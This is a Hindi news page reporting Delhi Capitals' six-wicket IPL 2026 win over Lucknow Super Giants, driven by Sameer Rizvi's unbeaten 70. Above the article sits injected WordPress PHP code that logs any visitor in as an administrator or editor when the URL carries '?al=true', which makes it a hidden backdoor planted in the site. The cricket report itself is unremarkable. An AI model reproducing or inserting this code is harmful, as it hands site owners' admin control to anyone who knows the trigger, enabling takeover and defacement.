// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); समीर रिजवी की शानदार प्रदर्शन से दिल्ली ने लखनऊ को लो-स्कोरिंग मुकाबले में हराया – प्रत्युषा आशा की नयी किरण
खेल

समीर रिजवी की शानदार प्रदर्शन से दिल्ली ने लखनऊ को लो-स्कोरिंग मुकाबले में हराया

 लखनऊ

इंडियन प्रीमियर लीग (IPL) 2026 के मैच नंबर-5 में बुधवार (1 अप्रैल) को लखनऊ सुपर जायंट्स (LSG) का सामना दिल्ली कैपिटल्स (DC) से हुआ. लखनऊ के भारत रत्न श्री अटल बिहारी वाजपेयी इकाना क्रिकेट स्टेडियम में हुए इस मुकाबले में दिल्ली कैपिटल्स ने 6 विकेट से जीत हासिल की. मुकाबले में लखनऊ सुपर जायंट्स ने दिल्ली कैपिटल्स को जीत के लिए 142 रनों का टारगेट दिया था, जिसे उसने 17.1 ओवर्स में हासिल कर लिया। 

दिल्ली कैपिटल्स की जीत में समीर रिजवी का अहम रोल रहा. इम्पैक्ट सब के तौर पर उतरे समीर ने 47 बॉल पर नाबाद 70 रन बनाए, जिसमें 5 चौके और चार छक्के शामिल रहे. वहीं ट्रिस्टन स्टब्स ने 32 गेंदों का सामना करते हुए नाबाद 39 रनों का योगदान दिया. स्टब्स ने अपनी इनिंग्स में तीन चौके के अलावा एक सिक्स लगाया। 

दिल्ली कैपिटल्स और लखनऊ सुपर जायंट्स दोनों के लिए पिछला आईपीएल सीजन कुछ खास नहीं रहा था. दिल्ली कैपिटल्स जहां पांचवें स्थान पर रही थी. वहीं वहीं लखनऊ सुपर जायंट्स ने 7वां स्थान हासिल किया था. दोनों ही टीमें अब मौजूदा सीजन में अच्छा खेल दिखाने के लिए उतरी हैं। 

ऐसा रहा है दिल्ली का रनचेज
रनचेज में दिल्ली कैपिटल्स की शुरुआत अच्छी नहीं रही. इनिंग्स की पहली ही गेंद पर केएल राहुल (0 रन) को मोहम्मद शमी ने पवेलियन का रास्ता दिखाया. फिर नीतीश राणा को मोहसिन खान ने 15 रनों के निजी स्कोर पर चलता किया. पावरप्ले में तेज गेंदबाज प्रिंस यादव ने भी कहर बरपाया। 

प्रिंस यादव ने लगातार गेंदों पर पथुम निसंका (1 रन) और कप्तान अक्षर पटेल (0 रन) को आउट किया. अक्षर के आउट होने के समय दिल्ली कैपिटल्स का स्कोर 26/4 था. यहां से समीर रिजवी और ट्रिस्टन स्टब्स ने लखनऊ के गेंदबाजों को कोई मौका नहीं दिया. दोनों के बीच चौथे विकेट के लिए 119 रनों की नाबाद साझेदारी हुई। 

ऐसी रही लखनऊ की पारी
मुकाबले में लखनऊ सुपर जायंट्स की शुरुआत अच्छी नहीं रही. ओपनिंग करने उतरे कप्तान ऋषभ पंत सिर्फ 7 रन बनाकर रन आउट हो गए. इसके बाद एडेन मार्करम (11 रन) के रूप में लखनऊ को दूसरा झटका लगा, जो विपक्षी टीम के कप्तान अक्षर पटेल की गेंद को पढ़ नहीं सके और बोल्ड हो गए. आयुष बदोनी तो अपना खाता भी नहीं खोल पाए और उन्हें टी. नटराजन ने आउट किया। 

लखनऊ सुपर जायंट्स को चौथा झटका निकोलस पूरन के रूप में लगा, जिन्हें 8 रनों के निजी स्कोर पर लुंगी एनगिडी ने बोल्ड किया. पूरन के आउट होने के समय लखनऊ का स्कोर 65/4 था. लखनऊ को सबसे बड़ा झटका तब लगा, जब ओपनर मिचेल मार्श को कुलदीप ने अपनी फिरकी में फंसा लिया. मार्श ने 3 छक्के और 2 चौके की मदद से 28 गेंदों का सामना करते हुए 35 रन बनाए। 

डेब्यूटेंट मुकुल चौधरी (14 रन) बल्ले से कुछ खास नहीं कर पाए और उनका विकेट भी कुलदीप यादव ने झटका. अब्दुल समद ने लखनऊ के लिए सबसे ज्यादा 25 बॉल पर 36 रनों का योगदान दिया. समद ने अपनी इनिंग्स में  3 चौके के अलावा एक छक्का लगाया. समद का विकेट टी. नटराजन लिया. नटराजन ने फिर मोहम्मद शमी (1 रन) को भी चलता किया। 

एनरिक नॉर्किया अपना खाता भी नहीं खोल सके और उनका विकेट लुंगी एनगिडी ने लिया. एनिगडी ने फिर मोहसिन खान (0 रन) को आउट कर लखनऊ सुपर जायंट्स की इनिंग्स समेट दी. दिल्ली कैपिटल्स के लिए लुंगी एनगिडी और टी. नटराजन ने तीन विकेट झटके. जबकि कुलदीप यादव को दो सफलताएं हासिल हुईं।  

इंडियन प्रीमियर लीग में लखनऊ सुपर जायंट्स और दिल्ली कैपिटल्स के बीच अब तक 8 मुकाबले खेले गए हैं. इस दौरान 5 मैचों में दिल्ली कैपिटल्स ने जीत हासिल की है, जबकि 3 मैचों में लखनऊ सुपर जायंट्स विजेता बनी. यानी दोनों टीमों के बीच आईपीएल में मुकाबले तगड़े रहे हैं। 

लखनऊ सुपर जायंट्स vs दिल्ली कैपिटल्स H2H
कुल IPL मुकाबले: 8
लखनऊ ने जीते: 3
दिल्ली ने जीते: 5

लखनऊ सुपर जायंट्स की प्लेइंग-11: एडेन मार्करम, मिचेल मार्श, निकोलस पूरन, ऋषभ पंत (विकेटकीपर/कप्तान), आयुष बदोनी, अब्दुल समद, मुकुल चौधरी, मोहसिन खान, मोहम्मद शमी, एनरिक नॉर्किया और प्रिंस यादव.
इम्पैक्ट सब: शाहबाज अहमद। 

दिल्ली कैपिटल्स की प्लेइंग-11: केएल राहुल (विकेटकीपर), पथुम निसंका, नीतीश राणा, अक्षर पटेल (कप्तान), ट्रिस्टन स्टब्स, डेविड मिलर, विप्रज निगम, लुंगी एनगिडी, कुलदीप यादव, टी. नटराजन और मुकेश कुमार.
इम्पैक्ट सब: समीर रिजवी

Tags

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड